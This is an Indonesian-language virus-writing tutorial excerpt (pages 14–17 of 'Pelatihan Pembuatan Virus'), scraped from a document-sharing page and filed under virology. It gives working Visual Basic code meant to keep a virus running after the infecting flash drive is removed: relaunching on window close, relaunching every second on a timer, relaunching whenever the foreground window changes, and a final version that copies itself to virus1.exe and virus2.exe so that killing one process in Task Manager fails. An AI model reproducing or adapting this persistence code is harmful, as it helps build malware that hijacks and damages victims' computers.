Add to collection(s) Add to saved
  1. Ilmu
  2. Biologi
  3. Virologi

Registry API - WordPress.com

advertisement 
Pelatihan Pembuatan Virus
Pengaktifan Virus Pada Sistem
The Black VB
Pengaktifan Virus pada Sistem
Jika virus telah melakukan penggandaan di system computer maka virus
tersebut akan mengaktifkan hasil penggandaannya yang telah berada disistem,
sehingga meskipun flashdisk atau pun media penyimpanan lainnya yang digunakan
sebagai suatu sarana penyebaran virus tersebut dilepas maka virus tersebut akan
tetap aktif.
Untuk melakukan pengaktifan virus yang telah berada pada system computer
virus tersebut hanya melakukan suatu perintah untuk menjalankan virus yang berada
di sisem computer tersebut dengan perintah Shell atau dengan perintah ShellExecute.
Pangaktifan akan dilakukan bila terjadi suatu proses atau pemanggilan suatu
aplikasi. Virus biasanya akan memanggil dirinya kembali sehingga jika salah virus
dimatikan dari task manager maka virus yang prosesnya belum dimatikan akan
memanggilnya kembali. Jadi tehnik ini cukup menyulit sesorang membunuh virus
tersebut.
Code untuk melakukan pengaktifan:
Shell Lokasi+namafile,Window Style
Berikut ini adalah contoh sederhana:
Kamu siapkan terlebih dahulu satu buah command button.
Private Sub Command1_Click()
Dim lokasi As String, namafile As String
With App
lokasi = .Path & "\"
namafile = .EXEName
End With
Shell lokasi & namafile & ".exe", vbNormalFocus
End Sub
Jadi dengan perintah tersebut kita mampu menjalankan program apapun termasuk
juga virus. Extensi nggak masalah karena jika membuat suatu file execute tanpa
extensi, kita bisa menjalankannya dengan perintah shell tapi jika menggunakan
langsung double-click pada windows tidak akan bisa.
Selanjutnya membuat suatu program yang tidak bisa ditutup dengan menge-click
tombol x pada windows:
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName
End With
DNA [eXTR!M]
Memori Club
Page 14
Pelatihan Pembuatan Virus
Pengaktifan Virus Pada Sistem
The Black VB
End Sub
Private Sub Form_Unload(Cancel As Integer)
Shell lokasi & namafile & ".exe", vbNormalFocus
End Sub
Dengan perintah diatas maka program tersebut akan melakukan pemanggilan dirinya
kembali ketika ditutup dengan menekan tombol x di sudut kanan atas.
Itu bisa terjadi dengan mengetikan perintah shell pada event Form_Unload
Berikutnya code pengaktifan setiap detik
Siapkan sebuah timer dengan Interval=1000 artinya akan menjalankan suatu perintah
pada event timer setiap satu detik.
1 detik= 1000 millidetik.
Dim lokasi As String
Dim namafile As String
Dim detik As Integer
Private Sub Form_Load()
If App.PrevInstance Then End
With App
lokasi = .Path & "\"
namafile = .EXEName
End With
End Sub
Private Sub Timer1_Timer()
Shell lokasi & namafile, vbNormalFocus
End Sub
Dengan mengisikan perintah pengaktifan pada event Timer maka program akan
melakukan pengaktifan setiap satu detik.
Disini kita juga harus menyiap penganan agar program hanya dapat berjalan sekali
saja, dengan perintah:
If App.PrevInstance Then End
Pada code berikut program akan melakukan pengaktifan jika suatu program
mendapatkan focus:
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Dim GFW As Long
Dim PrevGFW As Long
Dim lokasi As String
Dim namafile As String
DNA [eXTR!M]
Memori Club
Page 15
Pelatihan Pembuatan Virus
Pengaktifan Virus Pada Sistem
The Black VB
Private Sub Form_Load()
With App
If .PrevInstance Then End
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
End Sub
Private Sub Timer1_Timer()
GFW = GetForegroundWindow
If GFW <> Me.hWnd And PrevGFW <> GFW Then
Shell lokasi & namafile, vbNormalFocus
PrevGFW = GFW
End If
End Sub
Private Declare Function GetForegroundWindow Lib "user32" () As Long
GetForegroundWindow digunakan untuk mendapatkan nilai handle dari suatu
objek/program yang mendapatkan focus.
Setelah nilai handle tersebut didapat maka akan dilakukan pengecekan apakah handle
tersebut tidak sama dengan diri sendiri dan handle sebelumnya jika tidak sama
jalankan proses pengaktifan.
Berikut ini adalah kode pengaktifan yang baik:
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Dim GFW As Long
Dim PrevGFW As Long
Dim lokasi As String
Dim namafile
Private Sub Form_Load()
namafile = Array("virus1.exe", "virus2.exe", App.EXEName & ".exe")
If App.PrevInstance Then End
lokasi = App.Path & "\"
If Dir(lokasi & namafile(0)) = "" Or Dir(lokasi & namafile(1)) = "" Then
FileCopy lokasi & namafile(2), lokasi & namafile(0)
FileCopy lokasi & namafile(2), lokasi & namafile(1)
End If
End Sub
Private Sub Timer1_Timer()
GFW = GetForegroundWindow
If Me.hWnd <> GFW And PrevGFW <> GFW Then
Shell App.Path & "\" & namafile(0), vbNormalFocus
DNA [eXTR!M]
Memori Club
Page 16
Pelatihan Pembuatan Virus
Pengaktifan Virus Pada Sistem
The Black VB
Shell App.Path & "\" & namafile(1), vbNormalFocus
PrevGFW = GFW
End If
End Sub
Private Sub Form_Unload(Cancel As Integer)
Shell lokasi & namafile(0), vbNormalFocus
Shell lokasi & namafile(1), vbNormalFocus
End Sub
Pertama kali ketika virus dijalankan sang virus akan menduplikat dirinya dengan nama
Virus1.exe dan Virus2.exe yang diambil dari Array.
namafile = Array("virus1.exe", "virus2.exe", App.EXEName & ".exe")
Penduplikatan dilakukan dengan perintah:
FileCopy lokasi & namafile(2), lokasi & namafile(0)
FileCopy lokasi & namafile(2), lokasi & namafile(1)
Setelah itu virus akan menjalankan hasil duplikat tersebut setiap terjadi perubahan nilai
handle.
GFW = GetForegroundWindow
If Me.hWnd <> GFW And PrevGFW <> GFW Then
Shell App.Path & "\" & namafile(0), vbNormalFocus
Shell App.Path & "\" & namafile(1), vbNormalFocus
PrevGFW = GFW
End If
Virus akan menjalakan hasil duplicate apabila virus tersebut ditutup.
Private Sub Form_Unload(Cancel As Integer)
Shell lokasi & namafile(0), vbNormalFocus
Shell lokasi & namafile(1), vbNormalFocus
End Sub
DNA [eXTR!M]
Memori Club
Page 17
Download
advertisement